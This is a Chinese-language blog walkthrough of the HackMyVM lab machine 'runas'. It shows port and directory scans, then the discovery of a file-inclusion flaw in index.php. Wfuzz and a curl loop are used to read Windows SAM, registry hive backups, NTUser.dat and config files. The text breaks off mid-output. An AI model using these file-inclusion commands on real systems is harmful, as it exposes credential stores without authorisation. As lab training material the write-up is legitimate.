{"id":839,"date":"2025-06-08T10:45:21","date_gmt":"2025-06-08T02:45:21","guid":{"rendered":"http:\/\/162.14.82.114\/?p=839"},"modified":"2025-06-08T10:45:21","modified_gmt":"2025-06-08T02:45:21","slug":"hmv-_-runas","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/839\/06\/08\/2025\/","title":{"rendered":"hmv[-_-]runas"},"content":{"rendered":"<h1>runas<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041320.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041320.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608080344697\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041322.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041322.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608080309000\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTreadStone was here \ud83d\ude80\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.105:139\nOpen 192.168.10.105:445\nOpen 192.168.10.105:80\nOpen 192.168.10.105:135\nOpen 192.168.10.105:3389\nOpen 192.168.10.105:5357\nOpen 192.168.10.105:49153\nOpen 192.168.10.105:49154\nOpen 192.168.10.105:49156\nOpen 192.168.10.105:49157\nOpen 192.168.10.105:49152\nOpen 192.168.10.105:49155\n\nPORT      STATE SERVICE        REASON          VERSION\n80\/tcp    open  http           syn-ack ttl 128 Apache httpd 2.4.57 ((Win64) PHP\/7.2.0)\n|_http-server-header: Apache\/2.4.57 (Win64) PHP\/7.2.0\n| http-methods: \n|   Supported Methods: GET POST OPTIONS HEAD TRACE\n|_  Potentially risky methods: TRACE\n|_http-title: Index of \/\n135\/tcp   open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn    syn-ack ttl 128 Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds   syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n3389\/tcp  open  ms-wbt-server? syn-ack ttl 128\n|_ssl-date: 2025-06-08T00:07:17+00:00; +5s from scanner time.\n| ssl-cert: Subject: commonName=runas-PC\n| Issuer: commonName=runas-PC\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2025-06-07T00:01:50\n| Not valid after:  2025-12-07T00:01:50\n| MD5:   79d2:2c91:6900:cf44:07c4:be17:ad76:b183\n| SHA-1: 2a37:06f2:d351:9e58:d031:f6d4:1d46:7419:11f9:7470\n| -----BEGIN CERTIFICATE-----\n| MIIC1DCCAbygAwIBAgIQbmwyyXTSJoZIeYTVho1hWDANBgkqhkiG9w0BAQUFADAT\n| MREwDwYDVQQDEwhydW5hcy1QQzAeFw0yNTA2MDcwMDAxNTBaFw0yNTEyMDcwMDAx\n| NTBaMBMxETAPBgNVBAMTCHJ1bmFzLVBDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEAz\/9\/onOUclAE92QDCErEIK35pXJ\/RyJqibUfdZNbttNACY0USk51\n| OKqFI0cKOKQsXoc6Grxl7UfVwC9v6ZCoYTWl3YgMUq0auV8WoWluH1YaZ\/Oro8LD\n| H9RCqE0\/Dia8GOcmjkMlpIOA5sewWj4t09Mcs2gf1ALEeZfKgMwgyAwp7zjkOKpr\n| aR9mPudZWvcSvB9Cv0i69\/hfuixH4InCSsgM86jBXtqlpDD01XkT5u2xgXbd4GOL\n| 4PyHdomFahgeyvytPZ8b9RamvNh8xBtHBqKF1Tdur993m6Y\/T1k1vficRRuvs4tm\n| kKn6YaabmEpjbFd9AiRAqJrnQqsYIZ7ZXwIDAQABoyQwIjATBgNVHSUEDDAKBggr\n| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAHjb9pGELhjm\n| mOKB1ZhxwqGSc9+01mmb8rdS1Va\/fkusoogYG4mkurnukDNmUwwKCPsP9XWdQjgA\n| gz9K9+\/N4hMkhKptzBKAAj+JGcz7BJnSlkLKHnRsDaNAlTIN8r7fIFqLY2hh\/VrI\n| wFITd2yNOlXryUuBcXyzkdpn0q5QtwWsrcvLri\/i7h3Gg4LwdxfKE\/YFfG1VPLxH\n| dVurHBpA2OYAOoEb3jZRhA\/ryLSTV2Q3N437MBC1HTXH40JnVuS9PJuNdR7j4MM9\n| SMcpaGij6vIhUU2RAnsZhL25knOEsgPMyzrePAYWYu4ZZP18XlkiyShXibwx9tN8\n| ZiLbLHEvkpg=\n|_-----END CERTIFICATE-----\n| rdp-ntlm-info: \n|   Target_Name: RUNAS-PC\n|   NetBIOS_Domain_Name: RUNAS-PC\n|   NetBIOS_Computer_Name: RUNAS-PC\n|   DNS_Domain_Name: runas-PC\n|   DNS_Computer_Name: runas-PC\n|   Product_Version: 6.1.7601\n|_  System_Time: 2025-06-08T00:07:12+00:00\n5357\/tcp  open  http           syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Service Unavailable\n49152\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49153\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49154\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49155\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49156\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49157\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:15:AC:5F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 58509\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 48287\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 7707\/udp): CLEAN (Timeout)\n|   Check 4 (port 10964\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: RUNAS-PC, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:15:ac:5f (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   RUNAS-PC&lt;00&gt;         Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   RUNAS-PC&lt;20&gt;         Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:15:ac:5f:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb-os-discovery: \n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n|   Computer name: runas-PC\n|   NetBIOS computer name: RUNAS-PC\\x00\n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2025-06-08T03:07:12+03:00\n| smb2-time: \n|   date: 2025-06-08T00:07:12\n|_  start_date: 2025-06-08T00:01:48\n| smb-security-mode: \n|   account_used: &lt;blank&gt;\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_clock-skew: mean: -35m55s, deviation: 1h20m29s, median: 4s\n| smb2-security-mode: \n|   2:1:0: \n|_    Message signing enabled but not required<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/   \n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/runas\/reports\/http_192.168.10.105\/__25-06-07_20-18-05.txt\n\nTarget: http:\/\/192.168.10.105\/\n\n[20:18:05] Starting: \n[20:18:05] 403 -  199B  - \/%C0%AE%C0%AE%C0%AF\n[20:18:05] 403 -  199B  - \/%3f\/\n[20:18:05] 403 -  199B  - \/%ff\n[20:18:08] 403 -  199B  - \/.ht_wsr.txt\n[20:18:08] 403 -  199B  - \/.htaccess.bak1\n[20:18:08] 403 -  199B  - \/.htaccess.save\n[20:18:09] 403 -  199B  - \/.htaccess.sample\n[20:18:09] 403 -  199B  - \/.htaccess.orig\n[20:18:09] 403 -  199B  - \/.htaccess_orig\n[20:18:09] 403 -  199B  - \/.htaccess_extra\n[20:18:09] 403 -  199B  - \/.htaccess_sc\n[20:18:09] 403 -  199B  - \/.htaccessOLD2\n[20:18:09] 403 -  199B  - \/.htaccessBAK\n[20:18:09] 403 -  199B  - \/.htaccessOLD\n[20:18:09] 403 -  199B  - \/.htm\n[20:18:09] 403 -  199B  - \/.html\n[20:18:09] 403 -  199B  - \/.htpasswd_test\n[20:18:09] 403 -  199B  - \/.htpasswds\n[20:18:09] 403 -  199B  - \/.httr-oauth\n[20:18:27] 403 -  199B  - \/cgi-bin\/\n[20:18:27] 500 -  530B  - \/cgi-bin\/printenv.pl\n[20:18:39] 200 -  414B  - \/index.php\n[20:18:39] 200 -  414B  - \/index.pHp\n[20:18:39] 200 -  414B  - \/index.php.\n[20:18:39] 403 -  199B  - \/index.php::$DATA\n[20:18:39] 200 -  414B  - \/index.php\/login\/\n[20:19:01] 403 -  199B  - \/Trace.axd::$DATA\n[20:19:04] 403 -  199B  - \/web.config::$DATA\n\nTask Completed<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ curl -s http:\/\/$IP\/ | html2text\n****** Index of \/ ******\n    * index.php\n    * styles.css<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041323.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041323.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608081957106\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>fuzz\u53c2\u6570<\/h3>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u5305\u542b\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP\/index.php?file=styles.css&quot; | html2text\n****** There is no going back! ******\n***** ?file= *****\nbody {\n\n    font-family: Arial, sans-serif;\n\n    background-color: #f4f4f4;\n\n    margin: 0;\n\n    padding: 0;\n\n}\n\n.container {\n\n    max-width: 600px;\n\n    margin: 50px auto;\n\n    padding: 20px;\n\n    background-color: white;\n\n    border-radius: 8px;\n\n    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);\n\n    text-align: center;\n\n}\n\nh1 {\n\n    color: #333;\n\n    margin-bottom: 20px;\n\n}\n\nform {\n\n    margin-bottom: 20px;\n\n}\n\ninput[type=&quot;text&quot;] {\n\n    width: 80%;\n\n    padding: 10px;\n\n    border: 1px solid #ccc;\n\n    border-radius: 4px;\n\n    margin-right: 10px;\n\n}\n\nbutton {\n\n    padding: 10px 15px;\n\n    background-color: #28a745;\n\n    color: white;\n\n    border: none;\n\n    border-radius: 4px;\n\n    cursor: pointer;\n\n}\n\nbutton:hover {\n\n    background-color: #218838;\n\n}\n\n.output {\n\n    margin-top: 20px;\n\n    text-align: left;\n\n}<\/code><\/pre>\n<p>\u8bf4\u660e\u53ef\u4ee5\uff0c\u5c1d\u8bd5\u5e38\u89c1\u7684\u76ee\u5f55\u7a7f\u8d8a\uff0c\u4f46\u662f\u672a\u679c\uff0c\u5c1d\u8bd5fuzz\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ wfuzz -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-windows.txt -u &quot;http:\/\/$IP\/index.php?file=FUZZ&quot; --hw 35\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.10.105\/index.php?file=FUZZ\nTotal requests: 236\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000000015:   200        1928 L   12417 W    85387 Ch    &quot;C:\/php\/php.ini&quot;                                                                                                            \n000000044:   200        38 L     189 W      1375 Ch     &quot;C:\/WINDOWS\/System32\/drivers\/etc\/hosts&quot;                                                                                     \n000000045:   200        45 L     96 W       1042 Ch     &quot;C:\/Windows\/win.ini&quot;                                                                                                        \n000000041:   200        17 L     33 W       425 Ch      &quot;C:\/Windows\/repair\/system&quot;                                                                                                  \n000000040:   200        17 L     33 W       425 Ch      &quot;C:\/WINDOWS\/Repair\/SAM&quot;                                                                                                     \n000000078:   200        1928 L   12417 W    85387 Ch    &quot;c:\/PHP\/php.ini&quot;                                                                                                            \n000000077:   200        1928 L   12417 W    85387 Ch    &quot;c:\/php\/php.ini&quot;                                                                                                            \n000000067:   200        820 L    3729 W     79253 Ch    &quot;C:\/Windows\/System32\/inetsrv\/config\/applicationHost.config&quot;                                                                 \n000000064:   200        19 L     50 W       632 Ch      &quot;C:\/Windows\/system32\/config\/regback\/software&quot;                                                                               \n000000066:   200        598 L    2797 W     58608 Ch    &quot;C:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml&quot;                                                               \n000000062:   200        19 L     50 W       632 Ch      &quot;C:\/Windows\/system32\/config\/regback\/security&quot;                                                                               \n000000063:   200        19 L     50 W       630 Ch      &quot;C:\/Windows\/system32\/config\/regback\/system&quot;                                                                                 \n000000061:   200        19 L     50 W       627 Ch      &quot;C:\/Windows\/system32\/config\/regback\/sam&quot;                                                                                    \n000000060:   200        19 L     50 W       631 Ch      &quot;C:\/Windows\/system32\/config\/regback\/default&quot;                                                                                \n000000001:   200        17 L     33 W       425 Ch      &quot;C:\/Users\/Administrator\/NTUser.dat&quot;                                                                                         \n000000223:   200        302 L    1569 W     19622 Ch    &quot;c:\/WINDOWS\/system32\/drivers\/etc\/services&quot;                                                                                  \n000000220:   200        96 L     700 W      4760 Ch     &quot;c:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam&quot;                                                                               \n000000222:   200        44 L     232 W      1973 Ch     &quot;c:\/WINDOWS\/system32\/drivers\/etc\/protocol&quot;                                                                                  \n000000219:   200        38 L     189 W      1375 Ch     &quot;c:\/WINDOWS\/system32\/drivers\/etc\/hosts&quot;                                                                                     \n000000230:   200        17 L     33 W       425 Ch      &quot;c:\/WINDOWS\/setuperr.log&quot;                                                                                                   \n000000228:   200        313 L    2051 W     25712 Ch    &quot;c:\/WINDOWS\/setupact.log&quot;                                                                                                   \n000000221:   200        33 L     105 W      946 Ch      &quot;c:\/WINDOWS\/system32\/drivers\/etc\/networks&quot;                                                                                  \n000000233:   200        1170 L   13297 W    108051 Ch   &quot;c:\/WINDOWS\/WindowsUpdate.log&quot;                                                                                              \n\nTotal time: 0.456759\nProcessed Requests: 236\nFiltered Requests: 213\nRequests\/sec.: 516.6836<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u5b8c\u5168\u6ca1\u6709\u60f3\u5230\u7684\u5229\u7528\u65b9\u6cd5\u3002\u3002\u3002\u53ea\u80fd\u6328\u4e2a\u67e5\u770b\u4e00\u4e0b\u76ee\u5f55\u4e86\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ wfuzz -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-windows.txt -u &quot;http:\/\/$IP\/index.php?file=FUZZ&quot; --hw 35 2&gt;\/dev\/null &gt; wfuzz.log<\/code><\/pre>\n<p>\u8fd9\u91cc\u6709\u5f88\u795e\u5947\u7684\u60c5\u51b5\u53d1\u751f\uff0c\u8bf7\u770bvcr\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041325.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041325.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608085949618\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041326.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041326.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608090023542\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7528<code>bat<\/code>\u53ea\u662f\u4e3a\u4e86\u7f8e\u89c2\uff0c<code>cat -A<\/code>\u540c\u6837\u53ef\u4ee5\uff0c\u4e24\u4e2a\u67e5\u51fa\u6765\u7684\u5c45\u7136\u5dee\u8fd9\u4e48\u591a\u3002\u3002\u3002\u3002\u3002\u8bf4\u660e\u5bfc\u5165\u6587\u4ef6\u7684\u90e8\u5206\u5185\u5bb9\u662f\u4e0d\u53ef\u89c1\u7684\uff0c\u800c\u975e\u4e0d\u5b58\u5728\u7684\u3002\u3002\u3002\u670d\u4e86\uff0c\u6211\u8fd8\u4ee5\u4e3a\u89c1\u5230\u9b3c\u4e86\uff0c\u6b63\u5219\u534a\u5929\u53d1\u73b0\u8d8a\u7b5b\u9009\u8d8a\u591a\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat wfuzz.log | grep -v &quot;35&quot; | grep -oP &#039;&quot;\\K[^&quot;]+&#039; &gt; wfuzz.log1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat -A wfuzz.log1\nC:\/Users\/Administrator\/NTUser.dat$\n                                                                                         ^[[0m$\nC:\/php\/php.ini$\n                                                                                                            ^[[0m$\nC:\/Windows\/win.ini$\n                                                                                                        ^[[0m$\nC:\/WINDOWS\/Repair\/SAM$\n                                                                                                     ^[[0m$\nC:\/Windows\/repair\/system$\n                                                                                                  ^[[0m$\nC:\/WINDOWS\/System32\/drivers\/etc\/hosts$\n                                                                                     ^[[0m$\nc:\/php\/php.ini$\n                                                                                                            ^[[0m$\nC:\/Windows\/System32\/inetsrv\/config\/applicationHost.config$\n                                                                 ^[[0m$\nc:\/PHP\/php.ini$\n                                                                                                            ^[[0m$\nC:\/Windows\/system32\/config\/regback\/software$\n                                                                               ^[[0m$\nC:\/Windows\/system32\/config\/regback\/security$\n                                                                               ^[[0m$\nC:\/Windows\/system32\/config\/regback\/sam$\n                                                                                    ^[[0m$\nC:\/Windows\/system32\/config\/regback\/default$\n                                                                                ^[[0m$\nC:\/Windows\/system32\/config\/regback\/system$\n                                                                                 ^[[0m$\nC:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml$\n                                                               ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam$\n                                                                               ^[[0m$\nc:\/WINDOWS\/setuperr.log$\n                                                                                                   ^[[0m$\nc:\/WINDOWS\/WindowsUpdate.log$\n                                                                                              ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/services$\n                                                                                  ^[[0m$\nc:\/WINDOWS\/setupact.log$\n                                                                                                   ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/hosts$\n                                                                                     ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/protocol$\n                                                                                  ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/networks$\n                                                                                  ^[[0m$\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat wfuzz.log1 | sort | tail -n 23 &gt; wfuzz.log2\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat wfuzz.log2                                 \nc:\/php\/php.ini\nc:\/PHP\/php.ini\nC:\/php\/php.ini\nC:\/Users\/Administrator\/NTUser.dat\nC:\/WINDOWS\/Repair\/SAM\nC:\/Windows\/repair\/system\nc:\/WINDOWS\/setupact.log\nc:\/WINDOWS\/setuperr.log\nC:\/Windows\/system32\/config\/regback\/default\nC:\/Windows\/system32\/config\/regback\/sam\nC:\/Windows\/system32\/config\/regback\/security\nC:\/Windows\/system32\/config\/regback\/software\nC:\/Windows\/system32\/config\/regback\/system\nc:\/WINDOWS\/system32\/drivers\/etc\/hosts\nC:\/WINDOWS\/System32\/drivers\/etc\/hosts\nc:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam\nc:\/WINDOWS\/system32\/drivers\/etc\/networks\nc:\/WINDOWS\/system32\/drivers\/etc\/protocol\nc:\/WINDOWS\/system32\/drivers\/etc\/services\nC:\/Windows\/System32\/inetsrv\/config\/applicationHost.config\nC:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml\nc:\/WINDOWS\/WindowsUpdate.log\nC:\/Windows\/win.ini                                                                                               <\/code><\/pre>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ while IFS= read -r filename; do echo &quot;[+] \u5df2\u8bbf\u95ee: \\&quot;$filename\\&quot;&quot;; echo &quot;[+] \u5f53\u524d\u76ee\u5f55\u4e3a:\\&quot;$filename\\&quot;&quot; &gt;&gt; results.log; curl -s &quot;http:\/\/192.168.10.105\/index.php?file=${filename}&quot; | html2text &gt;&gt; results.log; echo &quot;&quot; &gt;&gt; results.log; done &lt; wfuzz.log2\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/php\/php.ini&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/PHP\/php.ini&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/php\/php.ini&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Users\/Administrator\/NTUser.dat&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/WINDOWS\/Repair\/SAM&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/repair\/system&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/setupact.log&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/setuperr.log&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/default&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/sam&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/security&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/software&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/system&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/hosts&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/WINDOWS\/System32\/drivers\/etc\/hosts&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/networks&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/protocol&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/services&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/System32\/inetsrv\/config\/applicationHost.config&quot;\n[+] 